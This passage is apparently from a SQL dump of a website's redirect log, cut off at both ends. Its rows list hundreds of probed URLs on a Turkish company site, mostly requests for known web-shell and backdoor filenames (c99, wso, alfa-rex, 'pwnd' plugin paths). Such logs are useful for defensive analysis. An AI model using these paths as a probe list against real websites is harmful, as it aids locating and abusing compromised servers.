00:00:00',301),(39216,'http://3s-technologies.com.tr/tr/.well-known/file.php',NULL,'','',75,0,'2025-03-28 13:26:50','0000-00-00 00:00:00',301),(39217,'http://3s-technologies.com.tr/tr/.well-known/makeasmtp.php',NULL,'','',13,0,'2025-03-28 13:26:51','0000-00-00 00:00:00',301),(39218,'http://3s-technologies.com.tr/tr/wp-admin/404.php',NULL,'','',36,0,'2025-03-28 13:26:55','0000-00-00 00:00:00',301),(39219,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/makeasmtp.php',NULL,'','',53,0,'2025-03-28 13:26:56','0000-00-00 00:00:00',301),(39220,'http://3s-technologies.com.tr/tr/ecoraiderusa.com/cong.php',NULL,'','',12,0,'2025-03-28 13:26:57','0000-00-00 00:00:00',301),(39221,'http://3s-technologies.com.tr/tr/wp-includes/system_log.php?p=',NULL,'','',6,0,'2025-03-28 13:27:05','0000-00-00 00:00:00',301),(39222,'http://3s-technologies.com.tr/tr/wp-includes/wp-activate.php',NULL,'','',10,0,'2025-03-28 13:27:06','0000-00-00 00:00:00',301),(39223,'http://3s-technologies.com.tr/tr/wp-includes/makeasmtp.php',NULL,'','',12,0,'2025-03-28 13:27:12','0000-00-00 00:00:00',301),(39224,'http://3s-technologies.com.tr/tr/wp-content/themes/admin.php',NULL,'','',120,0,'2025-03-28 13:27:18','0000-00-00 00:00:00',301),(39225,'http://3s-technologies.com.tr/tr/wp-admin/wp-signup.php',NULL,'','',13,0,'2025-03-28 13:27:25','0000-00-00 00:00:00',301),(39226,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/radio.php',NULL,'','',39,0,'2025-03-28 13:27:34','0000-00-00 00:00:00',301),(39227,'http://3s-technologies.com.tr/tr/wp-admin/images/file.php',NULL,'','',31,0,'2025-03-28 13:27:37','0000-00-00 00:00:00',301),(39228,'http://3s-technologies.com.tr/tr/wp-content/upgrade/function.php',NULL,'','',7,0,'2025-03-28 13:27:40','0000-00-00 00:00:00',301),(39229,'http://3s-technologies.com.tr/tr/wp-admin/user/themes.php',NULL,'','',9,0,'2025-03-28 13:27:41','0000-00-00 00:00:00',301),(39230,'http://3s-technologies.com.tr/tr/wp-admin/css/license.php',NULL,'','',6,0,'2025-03-28 13:27:43','0000-00-00 00:00:00',301),(39231,'http://3s-technologies.com.tr/tr/.well-known/wp-login.php',NULL,'','',53,0,'2025-03-28 13:27:51','0000-00-00 00:00:00',301),(39232,'http://3s-technologies.com.tr/tr/wp-includes/wp-load.php',NULL,'','',20,0,'2025-03-28 13:27:54','0000-00-00 00:00:00',301),(39233,'http://3s-technologies.com.tr/tr/wp-admin/file.php',NULL,'','',88,0,'2025-03-28 13:27:55','0000-00-00 00:00:00',301),(39234,'http://3s-technologies.com.tr/tr/wp-content/plugins/dropdown.php',NULL,'','',6,0,'2025-03-28 13:27:57','0000-00-00 00:00:00',301),(39235,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/plugins.php',NULL,'','',16,0,'2025-03-28 13:28:05','0000-00-00 00:00:00',301),(39236,'http://3s-technologies.com.tr/tr/wp-admin/license.php',NULL,'','',31,0,'2025-03-28 13:28:14','0000-00-00 00:00:00',301),(39237,'http://3s-technologies.com.tr/tr/api/5572214/envelope',NULL,'http://3s-technologies.com.tr/api/5572214/envelope/','',2,0,'2025-03-30 05:35:19','0000-00-00 00:00:00',301),(39238,'http://3s-technologies.com.tr/tr/dichku.php',NULL,'http://3s-technologies.com.tr/dichku.php','',14,0,'2025-03-30 05:35:22','0000-00-00 00:00:00',301),(39239,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/wp.php','',29,0,'2025-03-30 05:35:24','0000-00-00 00:00:00',301),(39240,'http://3s-technologies.com.tr/tr/wp-includes/html-api/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/html-api/chosen.php','',28,0,'2025-03-30 05:35:26','0000-00-00 00:00:00',301),(39241,'http://3s-technologies.com.tr/tr/.well-known/xp.php',NULL,'http://3s-technologies.com.tr/.well-known/xp.php','',1,0,'2025-03-30 05:35:28','0000-00-00 00:00:00',301),(39242,'http://3s-technologies.com.tr/tr/wp-content/themes/alera/alpha.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/alera/alpha.php','',68,0,'2025-03-30 05:35:34','0000-00-00 00:00:00',301),(39243,'http://3s-technologies.com.tr/tr/as/function.php',NULL,'http://3s-technologies.com.tr/as/function.php','',67,0,'2025-03-30 05:35:35','0000-00-00 00:00:00',301),(39244,'http://3s-technologies.com.tr/tr/components/com_jea/views/form/tmpl/admin.php',NULL,'http://3s-technologies.com.tr/components/com_jea/views/form/tmpl/admin.php','',1,0,'2025-03-30 05:35:36','0000-00-00 00:00:00',301),(39245,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/install.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/install.php','',1,0,'2025-03-30 05:35:37','0000-00-00 00:00:00',301),(39246,'http://3s-technologies.com.tr/tr/wp-admin/maint/cong.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/cong.php','',18,0,'2025-03-30 05:35:40','0000-00-00 00:00:00',301),(39247,'http://3s-technologies.com.tr/tr/wp-includes/blocks/button/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/button/index.php','',39,0,'2025-03-30 05:35:45','0000-00-00 00:00:00',301),(39248,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/about.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/ocean/about.php','',6,0,'2025-03-30 05:35:47','0000-00-00 00:00:00',301),(39249,'http://3s-technologies.com.tr/tr/css/content.php',NULL,'http://3s-technologies.com.tr/css/content.php','',1,0,'2025-03-30 05:35:48','0000-00-00 00:00:00',301),(39250,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/block-supports/index.php','',56,0,'2025-03-30 05:35:51','0000-00-00 00:00:00',301),(39251,'http://3s-technologies.com.tr/tr/wp-includes/certificates/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/certificates/admin.php','',8,0,'2025-03-30 05:35:56','0000-00-00 00:00:00',301),(39252,'http://3s-technologies.com.tr/tr/wp-admin/maint/maint.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/maint.php','',100,0,'2025-03-30 05:35:58','0000-00-00 00:00:00',301),(39253,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/skibidi.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/cay-van-phong/skibidi.php','',1,0,'2025-03-30 05:36:02','0000-00-00 00:00:00',301),(39254,'http://3s-technologies.com.tr/tr/wp-includes/assets/zzkmr.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/zzkmr.php','',1,0,'2025-03-30 05:36:03','0000-00-00 00:00:00',301),(39255,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/colors.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/colors.php','',1,0,'2025-03-30 05:36:07','0000-00-00 00:00:00',301),(39256,'http://3s-technologies.com.tr/tr/core.php',NULL,'http://3s-technologies.com.tr/core.php','',59,0,'2025-03-30 05:36:10','0000-00-00 00:00:00',301),(39257,'http://3s-technologies.com.tr/tr/wp-admin/includes/classwithtostring.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/classwithtostring.php','',1,0,'2025-03-30 05:36:11','0000-00-00 00:00:00',301),(39258,'http://3s-technologies.com.tr/tr/index/as.php',NULL,'http://3s-technologies.com.tr/index/as.php','',1,0,'2025-03-30 05:36:14','0000-00-00 00:00:00',301),(39259,'http://3s-technologies.com.tr/tr/webdb.php',NULL,'http://3s-technologies.com.tr/webdb.php','',13,0,'2025-03-30 05:36:15','0000-00-00 00:00:00',301),(39260,'http://3s-technologies.com.tr/tr/adminfuns.php',NULL,'http://3s-technologies.com.tr/adminfuns.php','',258,0,'2025-03-30 05:36:16','0000-00-00 00:00:00',301),(39261,'http://3s-technologies.com.tr/tr/duck.php',NULL,'http://3s-technologies.com.tr/duck.php','',3,0,'2025-03-30 05:36:17','0000-00-00 00:00:00',301),(39262,'http://3s-technologies.com.tr/tr/fonts/g12.php',NULL,'http://3s-technologies.com.tr/fonts/g12.php','',1,0,'2025-03-30 05:36:20','0000-00-00 00:00:00',301),(39263,'http://3s-technologies.com.tr/tr/images/dedi1.php',NULL,'http://3s-technologies.com.tr/images/dedi1.php','',1,0,'2025-03-30 05:36:21','0000-00-00 00:00:00',301),(39264,'http://3s-technologies.com.tr/tr/pages.php',NULL,'http://3s-technologies.com.tr/pages.php','',33,0,'2025-03-30 05:36:23','0000-00-00 00:00:00',301),(39265,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/hauaphph.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/HaUaphPh.php','',2,0,'2025-03-30 05:36:30','0000-00-00 00:00:00',301),(39266,'http://3s-technologies.com.tr/tr/wp-admin/atomlib.php',NULL,'http://3s-technologies.com.tr/wp-admin/atomlib.php','',11,0,'2025-03-30 05:36:32','0000-00-00 00:00:00',301),(39267,'http://3s-technologies.com.tr/tr/dedi1.php',NULL,'http://3s-technologies.com.tr/dedi1.php','',2,0,'2025-03-30 05:36:36','0000-00-00 00:00:00',301),(39268,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/dedi1.php',NULL,'http://3s-technologies.com.tr/vendor/phpunit/phpunit/src/Util/PHP/dedi1.php','',1,0,'2025-03-30 05:36:37','0000-00-00 00:00:00',301),(39269,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/index.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2023/index.php','',1,0,'2025-03-30 05:36:38','0000-00-00 00:00:00',301),(39270,'http://3s-technologies.com.tr/tr/wp-includes/images/media/fm.php',NULL,'http://3s-technologies.com.tr/wp-includes/images/media/fm.php','',1,0,'2025-03-30 05:36:40','0000-00-00 00:00:00',301),(39271,'http://3s-technologies.com.tr/tr/wp-includes/id3/item.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/item.php','',1,0,'2025-03-30 05:36:45','0000-00-00 00:00:00',301),(39272,'http://3s-technologies.com.tr/tr/ova.php4https:/worldbdsm.net/moon.php',NULL,'http://3s-technologies.com.tr/ova.php4https:/worldbdsm.net/moon.php','',1,0,'2025-03-30 05:36:46','0000-00-00 00:00:00',301),(39273,'http://3s-technologies.com.tr/tr/wp-includes/dedi1.php',NULL,'http://3s-technologies.com.tr/wp-includes/dedi1.php','',1,0,'2025-03-30 05:36:48','0000-00-00 00:00:00',301),(39274,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-lock.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-lock.php','',1,0,'2025-03-30 05:36:49','0000-00-00 00:00:00',301),(39275,'http://3s-technologies.com.tr/tr/.well-known/dedi1.php',NULL,'http://3s-technologies.com.tr/.well-known/dedi1.php','',1,0,'2025-03-30 05:36:50','0000-00-00 00:00:00',301),(39276,'http://3s-technologies.com.tr/tr/wp-editor.php',NULL,'http://3s-technologies.com.tr/wp-editor.php','',27,0,'2025-03-30 05:36:56','0000-00-00 00:00:00',301),(39277,'http://3s-technologies.com.tr/tr/.well-known/atomlib.php',NULL,'http://3s-technologies.com.tr/.well-known/atomlib.php','',2,0,'2025-03-30 05:36:58','0000-00-00 00:00:00',301),(39278,'http://3s-technologies.com.tr/tr/firewall.php7',NULL,'http://3s-technologies.com.tr/firewall.php7','',12,0,'2025-03-30 05:37:00','0000-00-00 00:00:00',301),(39279,'http://3s-technologies.com.tr/tr/wp-confiq.php',NULL,'http://3s-technologies.com.tr/wp-confiq.php','',1,0,'2025-03-30 05:37:01','0000-00-00 00:00:00',301),(39280,'http://3s-technologies.com.tr/tr/gettest.php',NULL,'http://3s-technologies.com.tr/gettest.php','',118,0,'2025-03-30 05:37:06','0000-00-00 00:00:00',301),(39281,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/function.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/function.php','',1,0,'2025-03-30 05:37:07','0000-00-00 00:00:00',301),(39282,'http://3s-technologies.com.tr/tr/retu11.php7',NULL,'http://3s-technologies.com.tr/retu11.PhP7','',10,0,'2025-03-30 05:37:11','0000-00-00 00:00:00',301),(39283,'http://3s-technologies.com.tr/tr/app.php',NULL,'http://3s-technologies.com.tr/app.php','',77,0,'2025-03-30 05:37:14','0000-00-00 00:00:00',301),(39284,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/modern/alfa-rex.php8',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/modern/alfa-rex.php8','',2,0,'2025-03-30 05:37:20','0000-00-00 00:00:00',301),(39285,'http://3s-technologies.com.tr/tr/wp-includes/rk2.php',NULL,'http://3s-technologies.com.tr/wp-includes/rk2.php','',14,0,'2025-03-30 05:37:22','0000-00-00 00:00:00',301),(39286,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/fsieps.php',NULL,'http://3s-technologies.com.tr/wp-admin/js/widgets/fsieps.php','',1,0,'2025-03-30 05:37:23','0000-00-00 00:00:00',301),(39287,'http://3s-technologies.com.tr/tr/wp-crom.php',NULL,'http://3s-technologies.com.tr/wp-crom.php','',22,0,'2025-03-30 05:37:26','0000-00-00 00:00:00',301),(39288,'http://3s-technologies.com.tr/tr/account.php',NULL,'http://3s-technologies.com.tr/account.php','',3,0,'2025-03-30 05:37:27','0000-00-00 00:00:00',301),(39289,'http://3s-technologies.com.tr/tr/wp-includes/id3/module.audio.ogg-pointer.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/module.audio.ogg-pointer.php','',1,0,'2025-03-30 05:37:34','0000-00-00 00:00:00',301),(39290,'http://3s-technologies.com.tr/tr/wp-content/themes/sky-pro/js.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/sky-pro/js.php','',31,0,'2025-03-30 05:37:35','0000-00-00 00:00:00',301),(39291,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/wp-login.php','',1,0,'2025-03-30 05:37:37','0000-00-00 00:00:00',301),(39292,'http://3s-technologies.com.tr/tr/brand.php',NULL,'http://3s-technologies.com.tr/brand.php','',33,0,'2025-03-30 05:37:39','0000-00-00 00:00:00',301),(39293,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-three/miin.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wordpress-three/miin.php','',1,0,'2025-03-30 05:37:41','0000-00-00 00:00:00',301),(39294,'http://3s-technologies.com.tr/tr/.well-known/gecko-litespeed.php',NULL,'http://3s-technologies.com.tr/.well-known/gecko-litespeed.php','',142,0,'2025-03-30 05:37:42','0000-00-00 00:00:00',301),(39295,'http://3s-technologies.com.tr/tr/wp-content/threefox_exploit/index.php',NULL,'http://3s-technologies.com.tr/wp-content/ThreeFox_Exploit/index.php','',1,0,'2025-03-30 05:37:45','0000-00-00 00:00:00',301),(39296,'http://3s-technologies.com.tr/tr/templates/atomic/templates.php',NULL,'http://3s-technologies.com.tr/templates/atomic/templates.php','',26,0,'2025-03-30 05:37:47','0000-00-00 00:00:00',301),(39297,'http://3s-technologies.com.tr/tr/yasnu.php',NULL,'http://3s-technologies.com.tr/yasnu.php','',33,0,'2025-03-30 05:37:49','0000-00-00 00:00:00',301),(39298,'http://3s-technologies.com.tr/tr/wp-includes/blocks/navigation-submenu/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/navigation-submenu/index.php','',1,0,'2025-03-30 05:37:50','0000-00-00 00:00:00',301),(39299,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/block-supports/index.php',NULL,'http://3s-technologies.com.tr/wordpress/wp-includes/block-supports/index.php','',1,0,'2025-03-30 05:37:53','0000-00-00 00:00:00',301),(39300,'http://3s-technologies.com.tr/tr/wp-includes/profile.php',NULL,'http://3s-technologies.com.tr/wp-includes/profile.php','',1,0,'2025-03-30 05:37:54','0000-00-00 00:00:00',301),(39301,'http://3s-technologies.com.tr/tr/ac.php',NULL,'http://3s-technologies.com.tr/ac.php','',48,0,'2025-03-30 05:37:55','0000-00-00 00:00:00',301),(39302,'http://3s-technologies.com.tr/tr/wp-content/plugins/helloapx/wp-apxupx.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/helloapx/wp-apxupx.php','',1,0,'2025-03-30 05:37:58','0000-00-00 00:00:00',301),(39303,'http://3s-technologies.com.tr/tr/loger.php',NULL,'http://3s-technologies.com.tr/loger.php','',1,0,'2025-03-30 05:38:00','0000-00-00 00:00:00',301),(39304,'http://3s-technologies.com.tr/tr/.tmb/admin.php',NULL,'http://3s-technologies.com.tr/.tmb/admin.php','',24,0,'2025-03-30 05:38:02','0000-00-00 00:00:00',301),(39305,'http://3s-technologies.com.tr/tr/wp-content/uploads/install.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/install.php','',1,0,'2025-03-30 05:38:05','0000-00-00 00:00:00',301),(39306,'http://3s-technologies.com.tr/tr/wp-includes/id3/about.php/wp-content/x/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/about.php/wp-content/x/index.php','',1,0,'2025-03-30 05:38:10','0000-00-00 00:00:00',301),(39307,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-categories-private.php',NULL,'http://3s-technologies.com.tr/wp-includes/widgets/class-wp-widget-categories-private.php','',1,0,'2025-03-30 05:38:11','0000-00-00 00:00:00',301),(39308,'http://3s-technologies.com.tr/tr/wp-content/tfr.php',NULL,'http://3s-technologies.com.tr/wp-content/tfr.php','',1,0,'2025-03-30 05:38:13','0000-00-00 00:00:00',301),(39309,'http://3s-technologies.com.tr/tr/ova-tools-private.php',NULL,'http://3s-technologies.com.tr/OVA-TOOLS-Private.php','',1,0,'2025-03-30 05:38:14','0000-00-00 00:00:00',301),(39310,'http://3s-technologies.com.tr/tr/images/c99.php',NULL,'http://3s-technologies.com.tr/images/c99.php','',33,0,'2025-03-30 05:38:15','0000-00-00 00:00:00',301),(39311,'http://3s-technologies.com.tr/tr/wp-includes/iz0r8xhwbh.php',NULL,'http://3s-technologies.com.tr/wp-includes/iz0r8xhwBh.php','',1,0,'2025-03-30 05:38:17','0000-00-00 00:00:00',301),(39312,'http://3s-technologies.com.tr/tr/.well-known/bs3.php',NULL,'http://3s-technologies.com.tr/.well-known/bs3.php','',1,0,'2025-03-30 05:38:18','0000-00-00 00:00:00',301),(39313,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/unslimnesss.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/ectoplasm/unslimnesss.php','',1,0,'2025-03-30 05:38:19','0000-00-00 00:00:00',301),(39314,'http://3s-technologies.com.tr/tr/poi.php8/search.php',NULL,'http://3s-technologies.com.tr/poi.PhP8/search.php','',1,0,'2025-03-30 05:38:21','0000-00-00 00:00:00',301),(39315,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/install.php',NULL,'http://3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/install.php','',1,0,'2025-03-30 05:38:24','0000-00-00 00:00:00',301),(39316,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/editor/fxp.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/editor/fxp.php','',1,0,'2025-03-30 05:38:25','0000-00-00 00:00:00',301),(39317,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/modern/about.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/modern/about.php','',3,0,'2025-03-30 05:38:26','0000-00-00 00:00:00',301),(39318,'http://3s-technologies.com.tr/tr/simple/function.php',NULL,'http://3s-technologies.com.tr/simple/function.php','',36,0,'2025-03-30 05:38:28','0000-00-00 00:00:00',301),(39319,'http://3s-technologies.com.tr/tr/mariju.php',NULL,'http://3s-technologies.com.tr/mariju.php','',44,0,'2025-03-30 05:38:29','0000-00-00 00:00:00',301),(39320,'http://3s-technologies.com.tr/tr/av.php',NULL,'http://3s-technologies.com.tr/av.php','',154,0,'2025-03-30 05:38:32','0000-00-00 00:00:00',301),(39321,'http://3s-technologies.com.tr/tr/hi.php',NULL,'http://3s-technologies.com.tr/hi.php','',51,0,'2025-03-30 05:38:33','0000-00-00 00:00:00',301),(39322,'http://3s-technologies.com.tr/tr/wp-admin/user/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/wp-login.php','',23,0,'2025-03-30 05:38:34','0000-00-00 00:00:00',301),(39323,'http://3s-technologies.com.tr/tr/wp-content/themes/hello-element/footer.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/hello-element/footer.php','',6,0,'2025-03-30 05:38:35','0000-00-00 00:00:00',301),(39324,'http://3s-technologies.com.tr/tr/wp-content/uploads/apache.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/apache.php','',1,0,'2025-03-30 05:38:43','0000-00-00 00:00:00',301),(39325,'http://3s-technologies.com.tr/tr/blog/wp-includes/deprecated-index.php',NULL,'http://3s-technologies.com.tr/blog/wp-includes/deprecated-index.php','',1,0,'2025-03-30 05:38:45','0000-00-00 00:00:00',301),(39326,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/aboud.php',NULL,'http://3s-technologies.com.tr/.well-known/acme-challenge/aboud.php','',2,0,'2025-03-30 05:38:49','0000-00-00 00:00:00',301),(39327,'http://3s-technologies.com.tr/tr/uploads/jp.php',NULL,'http://3s-technologies.com.tr/uploads/jp.php','',1,0,'2025-03-30 05:38:50','0000-00-00 00:00:00',301),(39328,'http://3s-technologies.com.tr/tr/wp-includes/ixr/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/IXR/admin.php','',49,0,'2025-03-30 05:38:51','0000-00-00 00:00:00',301),(39329,'http://3s-technologies.com.tr/tr/.well-known/cong.php',NULL,'http://3s-technologies.com.tr/.well-known/cong.php','',29,0,'2025-03-30 05:38:52','0000-00-00 00:00:00',301),(39330,'http://3s-technologies.com.tr/tr/wp-admin/images/dichku.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/dichku.php','',1,0,'2025-03-30 05:38:55','0000-00-00 00:00:00',301),(39331,'http://3s-technologies.com.tr/tr/as/dichku.php',NULL,'http://3s-technologies.com.tr/as/dichku.php','',1,0,'2025-03-30 05:38:56','0000-00-00 00:00:00',301),(39332,'http://3s-technologies.com.tr/tr/css/xa.php',NULL,'http://3s-technologies.com.tr/css/xa.php','',1,0,'2025-03-30 05:38:58','0000-00-00 00:00:00',301),(39333,'http://3s-technologies.com.tr/tr/wpn.php',NULL,'http://3s-technologies.com.tr/wpn.php','',1,0,'2025-03-30 05:38:59','0000-00-00 00:00:00',301),(39334,'http://3s-technologies.com.tr/tr/wp-includes/assets/autoload_classmap.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/autoload_classmap.php','',24,0,'2025-03-30 05:39:02','0000-00-00 00:00:00',301),(39335,'http://3s-technologies.com.tr/tr/litespeed.php',NULL,'http://3s-technologies.com.tr/litespeed.php','',2,0,'2025-03-30 05:39:06','0000-00-00 00:00:00',301),(39336,'http://3s-technologies.com.tr/tr/css/admin.php',NULL,'http://3s-technologies.com.tr/css/admin.php','',52,0,'2025-03-30 05:39:07','0000-00-00 00:00:00',301),(39337,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-error-get.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-error-get.php','',1,0,'2025-03-30 05:39:13','0000-00-00 00:00:00',301),(39338,'http://3s-technologies.com.tr/tr/wp-includes/fonts/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/fonts/chosen.php','',1,0,'2025-03-30 05:39:14','0000-00-00 00:00:00',301),(39339,'http://3s-technologies.com.tr/tr/about/dichku.php',NULL,'http://3s-technologies.com.tr/about/dichku.php','',1,0,'2025-03-30 05:39:19','0000-00-00 00:00:00',301),(39340,'http://3s-technologies.com.tr/tr/wp-admin/maint/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/admin.php','',153,0,'2025-03-30 05:39:20','0000-00-00 00:00:00',301),(39341,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/block-supports/chosen.php','',2,0,'2025-03-30 05:39:23','0000-00-00 00:00:00',301),(39342,'http://3s-technologies.com.tr/tr/wp-includes/images/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/images/admin.php','',2,0,'2025-03-30 05:39:25','0000-00-00 00:00:00',301),(39343,'http://3s-technologies.com.tr/tr/wp-admin/css/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/admin.php','',70,0,'2025-03-30 05:39:28','0000-00-00 00:00:00',301),(39344,'http://3s-technologies.com.tr/tr/tr.php',NULL,'http://3s-technologies.com.tr/tr.php','',2,0,'2025-03-30 05:39:29','0000-00-00 00:00:00',301),(39345,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/min.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/min.php','',1,0,'2025-03-30 05:39:30','0000-00-00 00:00:00',301),(39346,'http://3s-technologies.com.tr/tr/wp-mjdlxw.php',NULL,'http://3s-technologies.com.tr/wp-mjdlxw.php','',1,0,'2025-03-30 05:39:32','0000-00-00 00:00:00',301),(39347,'http://3s-technologies.com.tr/tr/st.php',NULL,'http://3s-technologies.com.tr/st.php','',74,0,'2025-03-30 05:39:34','0000-00-00 00:00:00',301),(39348,'http://3s-technologies.com.tr/tr/contents.php/lv.php',NULL,'http://3s-technologies.com.tr/contents.php/lv.php','',31,0,'2025-03-30 05:39:35','0000-00-00 00:00:00',301),(39349,'http://3s-technologies.com.tr/tr/wp-content/plugins/file.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/file.php','',1,0,'2025-03-30 05:39:36','0000-00-00 00:00:00',301),(39350,'http://3s-technologies.com.tr/tr/wp-includes/id3/network.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/network.php','',1,0,'2025-03-30 05:39:38','0000-00-00 00:00:00',301),(39351,'http://3s-technologies.com.tr/tr/about/sim.php',NULL,'http://3s-technologies.com.tr/about/sim.php','',1,0,'2025-03-30 05:39:41','0000-00-00 00:00:00',301),(39352,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentytwo/index.php','',102,0,'2025-03-30 05:39:42','0000-00-00 00:00:00',301),(39353,'http://3s-technologies.com.tr/tr/sxx.php',NULL,'http://3s-technologies.com.tr/sxx.php','',8,0,'2025-03-30 05:39:43','0000-00-00 00:00:00',301),(39354,'http://3s-technologies.com.tr/tr/css/vidorda.php',NULL,'http://3s-technologies.com.tr/css/vidorda.php','',1,0,'2025-03-30 05:39:45','0000-00-00 00:00:00',301),(39355,'http://3s-technologies.com.tr/tr/.well-known/login.php',NULL,'http://3s-technologies.com.tr/.well-known/login.php','',7,0,'2025-03-30 05:39:47','0000-00-00 00:00:00',301),(39356,'http://3s-technologies.com.tr/tr/assets/images/admin.php',NULL,'http://3s-technologies.com.tr/assets/images/admin.php','',1,0,'2025-03-30 05:39:48','0000-00-00 00:00:00',301),(39357,'http://3s-technologies.com.tr/tr/wp-content/languages/ru_ru_lite.mo.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/ru_RU_lite.mo.php','',15,0,'2025-03-30 05:39:53','0000-00-00 00:00:00',301),(39358,'http://3s-technologies.com.tr/tr/wp-admin/includes/taxonomy-compiler.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/taxonomy-compiler.php','',1,0,'2025-03-30 05:39:54','0000-00-00 00:00:00',301),(39359,'http://3s-technologies.com.tr/tr/wp-admin/user/file.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/file.php','',6,0,'2025-03-30 05:39:55','0000-00-00 00:00:00',301),(39360,'http://3s-technologies.com.tr/tr/images/sdivjcb_oxpicfri.php',NULL,'http://3s-technologies.com.tr/images/sdivjcb_oXpICfri.php','',1,0,'2025-03-30 05:39:57','0000-00-00 00:00:00',301),(39361,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/chosen.php','',2,0,'2025-03-30 05:39:58','0000-00-00 00:00:00',301),(39362,'http://3s-technologies.com.tr/tr/marijuana/icon.png',NULL,'http://3s-technologies.com.tr/MARIJUANA/icon.png','',1,0,'2025-03-30 05:39:59','0000-00-00 00:00:00',301),(39363,'http://3s-technologies.com.tr/tr/images/contact.php',NULL,'http://3s-technologies.com.tr/images/contact.php','',1,0,'2025-03-30 05:40:03','0000-00-00 00:00:00',301),(39364,'http://3s-technologies.com.tr/tr/special.php',NULL,'http://3s-technologies.com.tr/special.php','',43,0,'2025-03-30 05:40:05','0000-00-00 00:00:00',301),(39365,'http://3s-technologies.com.tr/tr/.well-known/2018wso.php',NULL,'http://3s-technologies.com.tr/.well-known/2018wso.php','',1,0,'2025-03-30 05:40:06','0000-00-00 00:00:00',301),(39366,'http://3s-technologies.com.tr/tr/wp-includes/customize/class-wp-customize-background-image-control-get.php',NULL,'http://3s-technologies.com.tr/wp-includes/customize/class-wp-customize-background-image-control-get.php','',1,0,'2025-03-30 05:40:10','0000-00-00 00:00:00',301),(39367,'http://3s-technologies.com.tr/tr/classsmtps.php',NULL,'http://3s-technologies.com.tr/classsmtps.php','',107,0,'2025-03-30 05:40:12','0000-00-00 00:00:00',301),(39368,'http://3s-technologies.com.tr/tr/wp-includes/requests/ssl-client.php',NULL,'http://3s-technologies.com.tr/wp-includes/Requests/SSL-client.php','',1,0,'2025-03-30 05:40:17','0000-00-00 